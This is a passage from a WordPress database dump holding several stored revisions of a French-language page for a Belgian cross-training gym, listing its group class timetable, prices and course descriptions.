18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:53:34', '2013-07-03 15:53:34', '', 11, 'http://www.crosstrainingcenter.be/?p=157', 0, 'revision', '', 0),
(158, 1, '2013-07-03 15:54:03', '2013-07-03 15:54:03', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi,Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:54:03', '2013-07-03 15:54:03', '', 11, 'http://www.crosstrainingcenter.be/?p=158', 0, 'revision', '', 0),
(161, 1, '2013-07-03 16:09:17', '2013-07-03 16:09:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"objectif\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:09:17', '2013-07-03 16:09:17', '', 11, 'http://www.crosstrainingcenter.be/?p=161', 0, 'revision', '', 0),
(159, 1, '2013-07-03 15:55:25', '2013-07-03 15:55:25', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"objectif\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 15:55:25', '2013-07-03 15:55:25', '', 11, 'http://www.crosstrainingcenter.be/?p=159', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
